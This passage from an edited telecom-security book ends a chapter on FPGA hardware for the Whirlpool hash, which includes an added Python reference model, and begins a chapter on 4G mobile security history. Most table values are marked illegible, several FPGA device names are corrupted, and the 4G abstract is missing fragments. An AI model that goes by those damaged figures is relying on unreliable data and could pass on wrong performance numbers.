Each one of the proposed implementations was captured by using the VHSIC hardware description language (VHDL), with structural description logic. Both implementations were simulated to operate correctly by using the test vectors which are provided by the NESSIE submission package (NESSIE, 2004) and the ISO/IEC 10118-3 standard (ISO, 2003). Parts of the proposed implementations were designed by using two alternative techniques.
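The simulation step just described checks the VHDL against published test vectors, which presupposes a trusted software model that produces the expected digest for any message. The following Python model is such a golden model, added here as an example; it is not the chapter's VHDL and not the Whirlpool designers' reference code. It assembles the hash from Equations 1 through 7 of the specification section (S-box, γ, π, θ, σ, key schedule, Miyaguchi-Preneel iteration, padding) and takes θ directly from the eight hardware-oriented expressions of Equation 8, so it also serves as a check that those expressions are consistent with the rest of the specification. The function names are the example's own; the 4-bit tables E and R and the empty-message digest used in the usage note are the values of the public Whirlpool specification, not values taken from the chapter.

```python
# Added example: software golden model of Whirlpool built from Equations 1-8 of the text.
# Not the chapter's VHDL and not the designers' reference code. The E and R mini-box
# tables below are the published Whirlpool values (E^-1 is derived as the inverse of E).

E = [0x1, 0xB, 0x9, 0xC, 0xD, 0x6, 0xF, 0x3, 0xE, 0x8, 0x7, 0x4, 0xA, 0x2, 0x5, 0x0]
E_INV = [E.index(v) for v in range(16)]
R = [0x7, 0xC, 0xB, 0xD, 0xE, 0x4, 0x9, 0xF, 0x6, 0x3, 0x8, 0xA, 0x2, 0x5, 0x1, 0x0]

def sbox_entry(u):
    """S-box value of byte u from the five mini-box stages (E, E^-1, R, E, E^-1) of Figure 8."""
    hi, lo = E[u >> 4], E_INV[u & 0xF]
    r = R[hi ^ lo]
    return (E[hi ^ r] << 4) | E_INV[lo ^ r]

S = [sbox_entry(u) for u in range(256)]

# Table X: multiplication by x in GF(2^8) modulo x^8 + x^4 + x^3 + x^2 + 1 (0x11D);
# X2 = X o X and X3 = X o X o X, as the text defines them.
def xtime(v):
    v <<= 1
    return v ^ 0x11D if v & 0x100 else v

X = [xtime(v) for v in range(256)]
X2 = [X[X[v]] for v in range(256)]
X3 = [X[X2[v]] for v in range(256)]
ROUNDS = 10

def theta_row(a):
    """Equation 8: the eight output bytes b_i0 ... b_i7 of one state row a_i0 ... a_i7."""
    return [
        a[0]^a[1]^a[3]^a[5]^a[7] ^ X[a[2]] ^ X2[a[3]^a[6]] ^ X3[a[1]^a[4]],
        a[0]^a[1]^a[2]^a[4]^a[6] ^ X[a[3]] ^ X2[a[4]^a[7]] ^ X3[a[2]^a[5]],
        a[1]^a[2]^a[3]^a[5]^a[7] ^ X[a[4]] ^ X2[a[5]^a[0]] ^ X3[a[3]^a[6]],
        a[0]^a[2]^a[3]^a[4]^a[6] ^ X[a[5]] ^ X2[a[6]^a[1]] ^ X3[a[4]^a[7]],
        a[1]^a[3]^a[4]^a[5]^a[7] ^ X[a[6]] ^ X2[a[7]^a[2]] ^ X3[a[5]^a[0]],
        a[0]^a[2]^a[4]^a[5]^a[6] ^ X[a[7]] ^ X2[a[0]^a[3]] ^ X3[a[6]^a[1]],
        a[1]^a[3]^a[5]^a[6]^a[7] ^ X[a[0]] ^ X2[a[1]^a[4]] ^ X3[a[7]^a[2]],
        a[0]^a[2]^a[4]^a[6]^a[7] ^ X[a[1]] ^ X2[a[2]^a[5]] ^ X3[a[0]^a[3]],
    ]

def mu(block):            # Equation 3: 64-byte string -> 8x8 matrix, b_ij = a_{8i+j}
    return [list(block[8 * i:8 * i + 8]) for i in range(8)]

def mu_inv(state):
    return bytes(b for row in state for b in row)

def gamma(a):             # non-linear layer: S-box on every byte
    return [[S[b] for b in row] for row in a]

def pi(a):                # cyclical permutation: column j shifted downwards by j
    return [[a[(i - j) % 8][j] for j in range(8)] for i in range(8)]

def theta(a):             # linear diffusion layer, applied row by row
    return [theta_row(row) for row in a]

def sigma(k, a):          # Equation 2: key addition
    return [[a[i][j] ^ k[i][j] for j in range(8)] for i in range(8)]

def rho(k, a):            # Equation 1: rho[k] = sigma[k] o theta o pi o gamma
    return sigma(k, theta(pi(gamma(a))))

def round_constant(r):    # Equation 6: row 0 holds S[8(r-1)+j], all other rows are 0
    c = [[0] * 8 for _ in range(8)]
    c[0] = [S[8 * (r - 1) + j] for j in range(8)]
    return c

def block_cipher_w(key, x):
    """Equations 4 and 5: sigma[K^0], then R rounds keyed by the on-the-fly key schedule."""
    k = key
    state = sigma(k, x)
    for r in range(1, ROUNDS + 1):
        k = rho(round_constant(r), k)      # K^r = rho[c^r](K^{r-1})
        state = rho(k, state)
    return state

def pad(message):
    """A 1-bit, 0-bits up to an odd multiple of 256 bits, then the 256-bit length of M."""
    padded = message + b"\x80"
    padded += b"\x00" * ((32 - len(padded) % 64) % 64)
    return padded + (8 * len(message)).to_bytes(32, "big")

def whirlpool(message):
    """Equation 7: Miyaguchi-Preneel iteration of W over the t padded blocks."""
    h = [[0] * 8 for _ in range(8)]        # H_0 = mu(IV), IV = 512 zero bits
    padded = pad(message)
    for off in range(0, len(padded), 64):
        eta = mu(padded[off:off + 64])
        w = block_cipher_w(h, eta)
        h = [[w[i][j] ^ h[i][j] ^ eta[i][j] for j in range(8)] for i in range(8)]
    return mu_inv(h)

if __name__ == "__main__":
    print(whirlpool(b"").hex())
```

Running the block prints the digest of the empty message, which for the final (2003) Whirlpool is 19FA61D75522A4669B44E39C1D2E1726C530232130D407F89AFEE0964997F7A73E83BE698B288FEBCF88E3E03C4F0757EA8964E59B63D93708B138CC42A66EB3, the same vector the NESSIE package supplies. Feeding theta_row the unit row (1, 0, ..., 0) returns (1, 1, 4, 1, 8, 5, 2, 9), the first row of the generator matrix, which is a quick way to confirm that the Equation 8 wiring reproduces the matrix multiplication it replaces.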

Figure 11. The DSP48 slice architecture (diagram: 18-bit A and B operands into a 36-bit multiplier, X/Y/Z multiplexers with Zero and Subtract controls, a 48-bit three-input adder/subtractor producing P, a 48-bit C input, BCIN/BCOUT and PCIN/PCOUT cascade buses from the previous slice and to the next slice, and a wire shift right by 17 bits)

Table 1. Performance analysis measurements

| Implementation | FPGA device | slices / BRAM | frequency (MHz) | throughput (Mbps) | throughput / slices |
| In McLoone et al. (2005), unroll x 2 | XC4VLX100 | (illegible) | 47.8 | 4896 | (illegible) |
| In McLoone et al. (2005), iterative | XC4VLX100 | (illegible) / 68 | 144 | 4790 | (illegible) |
| In Pramstaller et al. (2006) | XC2VP40 | 1456 / 0 | 131 | 382 | (illegible) |
| Author 1st_impl_bb | XC4VLX100 | (illegible) / 0 | 236 | 12000 | (illegible) |
| Author 1st_impl_lb | XC4VLX100 | (illegible) / 0 | 337 | 17200 | (illegible) |
| Author 2nd_impl_bb | XC4VLX100 | (illegible) / 0 | 275 | 7000 | (illegible) |
| Author 2nd_impl_lb | XC4VLX100 | (illegible) / 0 | 313 | 8000 | (illegible) |

The 4-bit mini boxes (E, E^-1, and R) were designed by using LUTs and Boolean expressions. The usage of FPGA-LUTs does not increase the algorithm execution latency. Besides, the LUTs are implemented by using function generators. So, for the implementation of the Whirlpool hash function four alternative solutions are proposed.

Two performance metrics are considered: the area utilized and the throughput achieved by the implementations. The measurements of the performance analysis are shown in Table 1, and comparisons with other Whirlpool hash hardware implementations (McLoone et al., 2005; Pramstaller et al., 2006) are also given. We denote as Boolean expressions based (BB) the mini box implementations that use Boolean expressions, and as LUT based (LB) the mini box implementations that use FPGA-LUTs.

Both implementations (1st and 2nd) were realized on the same FPGA device. The algorithm constants (c^r) are stored in a ROM which is implemented by using LUTs. The 2nd implementation uses a 10x512-bit RAM in order to store the necessary round keys. This RAM is mapped to the 5K-bit distributed RAM, and furthermore, none of the proposed implementations use block RAM (BRAM).

The 1st implementation requires 10 clock cycles for each block. So, the BB implementation throughput is 12 Gbps at 236 MHz clock frequency, and the LB implementation throughput is 17.2 Gbps at 337 MHz. The 2nd implementation was designed in order to support applications with area restrictions. It demands 20 clock cycles for each data block and requires less hardware resources. The BB implementation throughput is 7 Gbps at 275 MHz clock frequency and the LB implementation throughput is 8 Gbps at 313 MHz.

In McLoone et al. (2005) two Whirlpool hash hardware implementations are presented. In the first one, two rounds of the block cipher W are unrolled and during one clock cycle two rounds are performed. This method reduces the overall latency of the design, but it also results in a reduction in frequency. In order to compute the final hash output, the design needs to be iterated five times. This implementation achieves a throughput equal to 4896 Mbps at 47.8 MHz. The second one is an iterative implementation with an algorithmic latency equal to 10 clock cycles. The major difference from the previous one and also from the author's implementations is that it uses BRAM in order to implement the S-boxes. The throughput of this implementation is 4790 Mbps at 144 MHz. 68 BRAMs are also used.

In Pramstaller et al. (2006) a very compact Whirlpool hash hardware implementation is discussed. This design has a different philosophy than the implementations in this chapter and uses an innovative state representation that makes it possible to reduce the required hardware resources


remarkably. The complete implementation on an XC2VP40 Virtex FPGA requires 1456 CLB-slices and no BRAMs. It achieves a throughput equal to 382 Mbps at a clock frequency equal to 131 MHz.

As Table 1 shows, the author's proposed hardware implementations of the Whirlpool hash function clearly outperform all the other implementations. The proposed implementations are faster by a factor ranging from 1.5 to 45 times. Especially when comparing with the implementations in McLoone et al. (2005), some important results can be extracted. Firstly, the two implementations in McLoone et al. use the same FPGA device as the proposed implementations reported in this chapter. So, any comparisons are absolutely fair and accurate. Secondly, by using FPGA-LUTs much better results are achieved in both time performance and area requirements. Finally, regarding the ratio of throughput per slice, which measures the hardware resource cost associated with the throughput resulting from the implementation, it is proven that the philosophy of the proposed implementations in this chapter matches the FPGA characteristics better than the implementations in McLoone et al. (due to the high throughput per slice ratio). The design in Pramstaller et al. (2006) achieves a throughput equal to 382 Mbps at 131 MHz, slower by a factor ranging from 18 to 45 compared with the implementations in this chapter. However, as I have already mentioned, this design has a different philosophy and requires only a small amount of hardware resources.

Besides, comparisons with some other hash families' implementations (Ahmad & Shoba Das, 2005; Deepakumara et al., 2001; Dominikus, 2002; Grembowski et al., 2002; McLoone & McCanny, 2002; Sklavos & Koufopavlou, 2003, 2005; Yiakoumis et al., 2005) (the fastest implementations of the other hash families are collected) are given in Table 2 in order to have a fair and detailed comparison with the proposed implementations.

From Table 2, it is obvious that the Whirlpool implementation performs much better in terms of throughput, compared to all the previously published hash family implementations (Ahmad & Shoba Das, 2005; Deepakumara et al., 2001; Dominikus, 2002; Grembowski et al., 2002; McLoone & McCanny, 2002; Sklavos & Koufopavlou, 2003, 2005; Yiakoumis et al., 2005). The implementation in McLoone and McCanny (2002) uses the same FPGA device as the proposed implementations in this chapter. It also requires more hardware resources compared with the other hash families' implementations. This is a logical result of the algorithm philosophy and not an implementation trade-off. Finally, Whirlpool has the smallest algorithm execution latency. It needs only 10 clock cycles in order to transform each block, compared with the 64 clock cycles of MD5 and SHA-2 (256), and the 80 clock cycles of RIPEMD-160, SHA-1, and SHA-2 (384, 512). This is an important advantage of the hardware implementation.

Table 2. Comparisons with other hash families' implementations

| Implementation | FPGA device | slices | frequency (MHz) | throughput (Mbps) |
| MD5 (Dominikus, 2002) | XV00E | (illegible) | (illegible) | (illegible) |
| MD5 (Deepakumara et al., 2001) | XV000FG0 | (illegible) | (illegible) | (illegible) |
| SHA-1 (Yiakoumis et al., 2005) | Virtex-II | (illegible) | (illegible) | (illegible) |
| SHA-2 (512) (Sklavos & Koufopavlou, 2003) | XCV00 | (illegible) | (illegible) | (illegible) |
| SHA-2 (512) (Grembowski et al., 2002) | XCV000 | (illegible) | (illegible) | (illegible) |
| SHA-2 (512) (McLoone & McCanny, 2002) | XC4VLX100 | (illegible) + BRAM | (illegible) | (illegible) |
| SHA-2 (512) (Ahmad & Shoba Das, 2005) | Stratix EPS0FC | (illegible) LEs | (illegible) | (illegible) |
| RIPEMD-128 (Sklavos & Koufopavlou, 2005) | V0FG | (illegible) | (illegible) | (illegible) |
| RIPEMD-160 (Sklavos & Koufopavlou, 2005) | V0FG | (illegible) | (illegible) | (illegible) |
| Author 1st_impl_bb | XC4VLX100 | (illegible) | 236 | 12000 |
| Author 1st_impl_lb | XC4VLX100 | (illegible) | 337 | 17200 |
| Author 2nd_impl_bb | XC4VLX100 | (illegible) | 275 | 7000 |
| Author 2nd_impl_lb | XC4VLX100 | (illegible) | 313 | 8000 |

CONCLUSION

The Whirlpool hash function is the most recent hash function to be standardized. It was selected to be included in the NESSIE portfolio of cryptographic primitives. An efficient architecture and VLSI implementations for this hash function are presented in this chapter. Two architectures for the W block cipher are introduced. The first one is appropriate for high speed applications, since the round keys are produced on the fly, while the second one is appropriate for area restricted devices. Parts of the proposed implementations were designed by using two alternative techniques. The 4-bit mini boxes (E, E^-1, and R) were designed by using LUTs and Boolean expressions. So, four implementations have been introduced and each specific application can choose the appropriate speed-area trade-off implementation. The achieved throughput for the proposed implementations ranges from 7 Gbps to 17.2 Gbps. These hardware architectures and implementations are significantly faster than any other previously reported implementations of the algorithm and they are also up to 16.5 times faster than hardware implementations of other hash functions.

REFERENCES

Adams, C., & Farrell, S. (1999, March). Internet X.509 PKI—Certificate management protocols (RFC 2510). Retrieved March 1999, from http://www.ietf.org/rfc/rfc2510.txt

Ahmad, I., & Shoba Das, A. (2005). Hardware implementation analysis of SHA-256 and SHA-512 algorithms on FPGAs. Computers and Electrical Engineering, 31, 345-360.

Barreto, P. S. L. M., & Rijmen, V. (2003, May). The whirlpool hashing function (Rev. ed.). Paper presented at the NESSIE.

Deepakumara, J., Heys, H. M., & Venkatesan, R. (2001). FPGA implementation of MD5 hash algorithm. In IEEE Canadian Conference on Electrical and Computer Engineering (CCECE 2001) (Vol. 2, pp. 919-924).

Dobbertin, H. (1997). RIPEMD with two-round compress function is not collision free. Journal of Cryptology, 10, 51-69.

Dobbertin, H., Bosselaers, A., & Preneel, B. (1996). RIPEMD-160, a strengthened version of RIPEMD. In Fast Software Encryption (FSE'96) (LNCS 1039, pp. 71-82). Springer-Verlag.

Dominikus, S. (2002). A hardware implementation of MD4-family algorithms. In IEEE International Conference on Electronics Circuits and Systems (ICECS 2002) (pp. 15-18).

Grembowski, T., Lien, R., Gaj, K., Nguyen, N., Bellows, P., Flidr, J., et al. (2002). Comparative analysis of the hardware implementations of hash functions SHA-1 and SHA-512. In Fifth International Conference on Information Security (LNCS 2433, pp. 75-89). Springer-Verlag.

International Organization for Standardization (ISO). (2004). ISO/IEC 10118-3: Information technology—Security techniques—Hash functions—Part 3: Dedicated hash-functions. Retrieved 2003, from http://www.iso.org/iso/en/CatalogueDetailPage.CatalogueDetail?CSNUMBER=39876


Kitsos, P., & Koufopavlou, O. (2004). Efficient architecture and hardware implementation of the whirlpool hash function. IEEE Transactions on Consumer Electronics, 50(1), 208-213.

McLoone, M., & McCanny, J. V. (2002). Efficient single-chip implementation of SHA-384 & SHA-512. In IEEE International Conference on Field-Programmable Technology (FPT) (pp. 311-314).

McLoone, M., McIvor, C., & Savage, A. (2005). High-speed hardware architectures of the whirlpool hash function. In IEEE International Conference on Field-Programmable Technology (FPT) (pp. 13-18).

Menezes, A. J., Van Oorschot, P. C., & Vanstone, S. A. (1997). Handbook of applied cryptography. CRC Press.

National Institute of Standards and Technology (NIST). (1995, April 17). SHA-1 standard, secure hash standard (FIPS PUB 180-1). Retrieved April 17, 1995, from http://www.itl.nist.gov/fipspubs/fip180-1.htm

National Institute of Standards and Technology (NIST). (2002, August 1). SHA-2 standard, secure hash standard (FIPS PUB 180-2). Retrieved August 1, 2002, from http://csrc.nist.gov/publications/fips/fips180-2/fips180-2.pdf

National Institute of Standards and Technology (NIST). (2005, December). SP800-77, Guide to IPSec VPN's. Retrieved December 2005, from http://csrc.nist.gov/publications/nistpubs/800-77/sp800-77.pdf

New European schemes for signatures, integrity, and encryption (NESSIE). (2004). Retrieved March 2004, from https://www.cosic.esat.kuleuven.ac.be/nessie

Pramstaller, N., Rechberger, C., & Rijmen, V. (2006). A compact FPGA implementation of the hash function whirlpool. In 14th ACM/SIGDA International Symposium on Field-Programmable Gate Arrays (FPGA) (pp. 159-166). ACM Press.

Sklavos, N., & Koufopavlou, O. (2003). On the hardware implementation of the SHA-2 (256, 384, 512) hash functions. In IEEE International Symposium on Circuits and Systems (ISCAS 2003) (Vol. V, pp. 153-156).

Sklavos, N., & Koufopavlou, O. (2005). On the hardware implementation of RIPEMD processor: Networking high speed hashing, up to 2 Gbps. Computers and Electrical Engineering, 31, 361-379.

Wang, X., Yin, Y. L., & Yu, H. (2005). Finding collisions in the full SHA-1. In Advances in Cryptology, 25th Annual International Cryptology Conference (LNCS 3621, Santa Barbara, CA, pp. 17-36).

Xilinx Incorporated. (2006). Silicon solutions—Virtex series FPGAs. Retrieved October 10, 2006, from http://www.xilinx.com/products/

Yiakoumis, I., Papadonikolakis, M., Michail, H., Kakarountas, A. P., & Goutis, C. E. (2005). Efficient small-sized implementation of the keyed-hash message authentication code. In IEEE International Conference on "Computer as a tool" (EUROCON 2005) (pp. 1875-1878).

KEY TERMS

Cryptography: In modern times, cryptography has become a branch of information theory, as the mathematical study of information and especially its transmission from place to place. Cryptography is central to the techniques used in computer and network security for such things as access control and information confidentiality.

DSP48 Slice: The DSP48 slice is the basic building block of Xilinx Virtex-4 FPGAs.

Field-Programmable Gate Array (FPGA) Device: An FPGA device is a semiconductor device used to process digital information, similar to a microprocessor. It uses gate array technology that can be reprogrammed after it is manufactured, rather than having its programming fixed during the manufacturing—a programmable logic device.


Hardware Implementation: Hardware implementation is the building of the blocks of a digital chip (either ASIC or FPGA) design and relates them to the hardware description languages that are used in their creation.

Hash Function: A hash function is a function that maps an input of arbitrary length into a fixed number of output bits, the hash value.

New European Schemes for Signatures, Integrity, and Encryption (NESSIE): NESSIE was a European project that was responsible for introducing new cryptographic primitives with high security levels.

Whirlpool Hash Function: The Whirlpool hash function is the most recent hash function to be standardized. It was selected to be included in the NESSIE project of cryptographic primitives.

Section II
Security in 3G/B3G/4G


Chapter XVIII
Security in 4G
Artur Hecker
Ecole Nationale Supérieure des Télécommunications (ENST), France

Mohamad Badra
National Center for Scientific Research, France

ABSTRACT

The fourth generation (4G) of mobile networks will be a technology-opportunistic and user-centric system combining the economic and technological advantages of different transmission technologies to provide a context-aware and adaptive service access anywhere and at any time. Security turns out to be one of the major problems that arise at different interfaces when trying to realize such a heterogeneous system by integrating the existing wireless and mobile systems. Indeed, current wireless systems use very different and difficult to combine proprietary security mechanisms, typically relyin
ated user and infrastructure management means. It is generally impossible to apply a security policy to a system consisting of different heterogeneous subsystems. In this chapter, we first br
security of candidate 4G access systems, such as 2/3G, wireless LAN (WLAN), WiMax, and so forth. In the next step, we discuss the arising security issues of the system interconnection. We
logical access problem in heterogeneous systems and show that both the technology-bound, low-layer and the overlaid high-layer access architectures exhibit clear shortcomings. We present and discuss several proposed approaches aimed at achieving an adaptive, scalable, rapid, easy-to-manage, and secure 4G service access independently of the used operator and infrastructure. We the
requirements on candidate systems to support such 4G security.

Copyright © 2008, IGI Global, distributing in print or electronic forms without written permission of IGI Global is prohibited.
Security in 4G

GENERATIONS OF PUBLIC LAND MOBILE NETWORKS

From 1G to 2G

The first generation of public land mobile networks (PLMN) is characterized by the fact that both control channels and traffic channels are analog. Voice (commonly at 3 kHz) and data (if any) are frequency-modulated on a carrier. Today, these networks are usually summarized under the common name first generation (1G), although there are different analog network standards like Nordic mobile telephony (NMT), American mobile phone system (AMPS), and total access communication system (TACS).

NMT was the first commercially operated PLMN (1981). NMT uses two different frequency bands, at about 450 and about 900 MHz (NMT 450 and NMT 900). NMT 900 was introduced in 1986 as a result of the fact that the number of channels in NMT 450 was insufficient. NMT 900 has been implemented in Europe, the Middle East, and Asia.

AMPS was specified by the U.S. consortium TIA/EIA/ANSI. The first AMPS network became operational in 1984. In 1988, an extension providing additional frequency bands was added (E-AMPS). AMPS networks are found in the Americas, Australia, and in Asia.

TACS is a modification of AMPS aiming at the British market, where the standard was operational in 1985. TACS also received a wider frequency band in 1988, E-TACS. Since that time, TACS has spread to many countries around the world.

In 1982, at the time of the commercialization of the first 1G networks, the Groupe Spécial Mobile was formed at CEPT (Conférence européenne des Administrations des Postes et des Télécommunications, the creator and standard-body predecessor of today's European Telecommunications Standards Institute, ETSI), with the task of developing a Europe-wide standard for cellular communication. In other words, the scope here was to provide the same service (voice) by a new, universal system.

In 1987 the CEPT working group decided to build a digital, narrowband time division multiple access (TDMA) system. In 1990, ETSI published Phase I of the GSM system specifications. Three frequency bands have been defined for global system for mobile communications (GSM) usage: 900 MHz, 1800 MHz, and 1900 MHz. The corresponding standards are similar, aiming at

Table 1. Ten-year cycles in the mobile networks (from a European view)

Year   Milestone                                                                          Cycles
1981   Commercial deployment of NMT: 1G start                                             1G to 2G: 10 years
1982   Creation of Groupe Spécial Mobile at CEPT
1984   Commercial deployment of AMPS networks in the US
1986   Big number of users leads to NMT extensions
1988   Big number of users leads to AMPS extensions
1989   European Union RACE Project "invents" UMTS                                         3G conception: 10 years
1992   World Administrative Radio Conference (today: WRC) allocates 230 MHz to
       Future Public Land Mobile Telecommunication System (FPLMTS)
1992   Commercial deployment of GSM: 2G start                                             2G to 3G: 10 years
1994   Second wave of UMTS research projects
1995   RACE vision of UMTS
1996   Creation of UMTS task force
1996   Digital overcomes analog
1997   Establishment of the UMTS Forum
1999   UMTS decision
2000   WRC designates IMT-2000 extension bands
2002   Commercial deployment of UMTS: 3G start


wide-range (GSM 900) and dense-area (GSM 1800/1900) deployments respectively. The first commercial GSM services were launched in the middle of 1991, thus marking the start of the second generation (2G) era.

GSM was the first completely digital PLMN. It is thus naturally a revolutionary approach, as compared to its analog predecessors. GSM defines a series of improvements and innovations compared to previous cellular networks, aiming for an efficient use of the available spectrum; secure transmissions; an improvement in voice quality; a reduction in the cost of handsets (using very large-scale integration [VLSI]); infrastructure and management; an ability to support new services; and a full compatibility with Integrated Services Digital Network (ISDN) and with other data transmission networks. Another basic characteristic of the system is called international roaming, that is, the possibility for the mobile user to access GSM service even when he/she finds himself/herself physically outside the coverage area for which he/she is subscribed, registering as a "visitor." Provided that the necessary business contracts exist, the roaming is completely automatic. In addition to roaming, GSM offers new user services, including data transmission, fax service, and short message service (SMS).

Thus, in Europe one completely new standard has replaced different existing ones. Almost the contrary happened in the U.S.: the quasi-unique AMPS has been replaced by a variety of (at least partially) incompatible, (partially) digital systems: N-AMPS, D-AMPS (IS-54, IS-136), PCS (IS-95), GSM 1900, Omnipoint, and PACS.

The variety of incompatible networks and the increasing popularity of data services have motivated and much influenced the work on the third generation (3G) of mobiles. In 1992, at the same time as the commercial deployment of the first 2G networks started, the International Telecommunications Union (ITU) allocated frequency ranges for the next generation of PLMN (then called FPLMTS), thus providing an international common base for the 3G. Finally, in 2002 the first commercial 3G networks were deployed in Japan.

Table 1 summarizes the history of the PLMN development from the European point of view as presented in Pereira (2000). In particular, it illustrates the repeating approximate 10-year cycles both in the conception phases and in the generation lifetimes.

Third Generation of PLMN

The 3G of mobiles was expected to be the future global standard for the integrated voice and data communications. 3G was designed in the last decade of the 20th century with the goal to provide enhanced wide-range voice and data services. But it turns out that it changes little in the actual user experience.

Technically, 3G design mainly aimed at the improvement of the radio link performance in the 2G scope. Although the developed standard features drastically improved data rates as compared to 2G, from the point of view of the data services the practically offered data rates can still be considered scarce. This can be observed in a direct comparison to the development of the wired technologies providing home Internet access. From 1994 until 2004, the phone-line Internet access technologies have evolved from V.34 modems (28.8 kbps) over V.90 (56 kbps) to cable (1-2 Mbps shared) and ADSL (originally 500 kbps, 2004 up to 10 Mbps). This means an almost 350-fold increase in 10 years. In the same period, the data rate of the wireless cellular access has not been able to keep up the pace. From the original GSM CSD service introduced in 1994 and providing 9.6 kbps, the cellular systems evolved over General Packet Radio Service (GPRS) (about 64 kbps in practice) to EDGE/cdma2000 RTT-1X (typically about 100-130 kbps). The 3G (e.g., UMTS) provides about 300 kbps in practice. This corresponds to a 30-50 fold increase in the same decade. Moreover, the provided data rates highly depend on the network operator's overall capacity, the number of users in the cell, and the distance to the base station.

However, the relatively limited data rate is not the only problem of the 3G data service. Because of the vast, national-scope infrastructure and many intermediate nodes, the user experiences


high network latency (e.g., from the point of view of IP, the whole 3G infrastructure is one link). GPRS and EDGE often exhibit network round trip times (RTT) of 600 ms and more. UMTS links are expected to be better, but they still have an RTT of about 200-250 ms. The wideband code division multiple access (W-CDMA)/high speed downlink packet access (HSDPA) service, defined in the fifth release, is expected to have more than 100 ms RTT, that is, almost an Internet-level RTT. Such high network latencies are inappropriate for certain application classes: interactive applications imply latency constraints that typically lie under the 300-400 ms overall RTT proposed by 3G (the end system is not necessarily within the UMTS backbone and thus the typical Internet RTT of about 100-200 ms has to be added to the 3G latency). For example, voice over IP (VoIP) and similar applications (videoconferencing, etc.) require the RTT to be under 250 ms; in some existing popular interactive online games (e.g., id Software's Quake) the maximal acceptable RTT to the game server is required to be under 100 ms in order to provide a fair chance of winning and a good game experience.

Furthermore, by its design 3G targets telecommunications providers. Like 2G, 3G uses a license model to prevent random medium access by non-authorized parties. Since the licenses are expensive (Van Damme, 2002), in reality this implies a major telecom operator with a mammoth infrastructure behind every 3G RAN. To fulfill the requirements of such an authority, the 3G RANs are designed to be reliable and manageable and to support different qualities of service. This justifies the high cost of the 3G equipment. At the same time, this limits the competition on the market to few license holders who not only have invested a lot in the infrastructure but also have paid a high price for the license. The operators have to amortize this fixed cost and the current variable maintenance and management cost over the user services provided by the infrastructure. Thus, 3G RAN access is likely to remain costly. It is unclear if attractive unlimited flat-line pricing models (like in xDSL) are applicable to such infrastructures. Current per

Figure 1. 3G: Current and planned UMTS launches


byte (or even per minute!) pricing seems hardly suitable for the always-on paradigm.

A consequent national-scope investment is needed for 3G advantages to materialize (both for users and for providers). This is however difficult to afford, especially in developing countries where big investments are particularly risky. In a focused coverage, 3G comes at a very high cost per bit compared to other, more data-centric technologies like local or metropolitan area networks. That is one of the reasons why the 3G systems had a difficult start. They are primarily being deployed in Japan, South Korea, Taiwan, Hong Kong, Indonesia, a few countries of South America, Australia, New Zealand, western Europe, and North America (CDMA Development Group, n.d.; GSM Association, n.d.). Figure 1 (GSM Association, n.d.) summarizes the actual and planned commercial launches of the 3G system from the 2004 European point of view (W-CDMA/UMTS). It shows that the developed countries prevail.

Although the slow 2G-3G transition process started in 2003-2004, so far the 3G systems do not seem suitable to provide a broadband data access service deployment. In the developed world, these are often considered technologically inadequate (users perceive it as a better 2G). For the developing world, the technology needs major investments. Thus, a new, more flexible technology is necessary, allowing new usage scenarios and business models.

The Anticipated 3G to 4G Transition

In regards to 3G, the observed 10-year cycles seem to continue. The first research concepts aiming at 3G appeared about 1989. The spectrum was reserved by ITU-R's World Radiocommunication Conference (ITU-R Radiocommunication Conference, 1992), that is, at the same time as the first 2G networks were deployed. The active technological development of 3G started with the creation of the UMTS task force in 1996 and culminated in the UMTS decision in 1999. The largest parts of the standards were accomplished by then. Consequently, the first projects naming a fourth generation (4G) started in the late 1990s and the first dedicated thoughts about beyond 3G (B3G) and 4G systems appeared in the international research press about 2000-2001 (Bria et al., 2001; Evans & Baughan, 2000; Pereira, 2000; Raivio, 2001; Varshney & Jain, 2001), that is, just before the first commercial 3G networks were deployed in Japan. In 2000, the WRC allocated 3G extension bands, which were to be used in the B3G scope. All this corresponds to the 10-year cycles illustrated in Table 1.

Continuing along this line, the concrete shapes of 4G should be clarified by the end of 2007 and the active 4G vision refinement should start about 2007-2008. This should be finished roughly by 2010, with several detail issues being addressed in the following years. The first commercial systems could then be operational by 2012. However, this presumes that no additional delays occur.

Possible Delays

At least in Europe and in the U.S., the 3G deployment seems to be delayed. Indeed, by the end of 2004, not all western European countries had started the 3G deployment. Also, the deployment process is starting quite slowly, often being limited to some few centers. The critics of 3G claim that the reasons for this could be in the developed technology itself. Indeed, one could argue that 3G (in Europe: UMTS) is too complicated and too costly to become successful. One could also criticize the fact that the original goal of creating one common global standard has not been achieved since different concurrent versions of 3G are being standardized and deployed, in some extreme cases within the same country (e.g., Japan has deployed both cdma2000 and W-CDMA). However, the deployment of the alternative technologies (like, e.g., 802.11 hotspots or WiMax) also lags behind the expectations that have predicted a WiFi boom and hotspot number explosions by 2005, which so far have failed to become true. There is no doubt about the popularity of WiFi. However, it is not booming; it is being carefully developed. The real reasons thus could be either of a social (e.g., a simple current disinterest in mobile data) or of an economic nature (too costly in deployment, too risky for operators; too costly, too complicated for users, etc.).


We tend to think that economic barriers prevail. Indeed, businesses have so far often expressed their need for mobile communications development. This has been much discussed in different business scopes: home- and telework, instant data access for mobile sales personnel, fleet management, reduction of infrastructural costs, globalization, and so forth. With the further development of the Internet and the associated technologies, private users are also likely to be interested in services such as mobile e-commerce, online gaming, private communications (e.g., voice or instant messaging), various personal and business data exchanges, and so forth.

The telecommunication crisis initiated by the complete flop of the exaggerated initial Internet business activities (often referred to as the bursting of the Internet bubble) could have been one of the key economic factors responsible for the observed 3G deployment delays. Indeed, the investments in the IT and telecommunication sectors have since radically switched from headlong promiscuity to skeptical cautiousness. From the European point of view, the starting crisis was amplified by the UMTS license auctions in 2000-2001 raising cumulatively over 100 billion USD in the Western European countries (Van Damme, 2002).

The paid spectrum prices washed away much of the liquidity of the Western-European telecommunications operators. Yet, this liquidity was necessary for the deployment of the network (infrastructure updates and add-ons). Since the UMTS cannot substantially improve the GSM voice service as such, the only added value of the UMTS is in the improved data services. Hence, compared to classic GSM offerings, the paid auction price for the UMTS licenses must be amortized over time over the new services, which UMTS is just about to propose. However, this could render these new services particularly expensive.

4G: A TECHNOLOGY-OPPORTUNISTIC, USER-CENTRIC SYSTEM

4G Expectations

With the ongoing globalization, world-wide communications become an essential service. The 3G, meant to provide a global communications standard, has mostly failed to do so. Instead, it now uses different standards in different countries. Moreover, 3G remains a closed "big company" telecommunications forum. That results in the situation where users still need costlier multi-band, multi-technology handsets, yet they cannot access the 3G services using other devices over newer radio access networks (RANs). To provide users with a world-wide service we need open, flexible standards, also suitable for the Internet and data communications deployment in the developing countries.

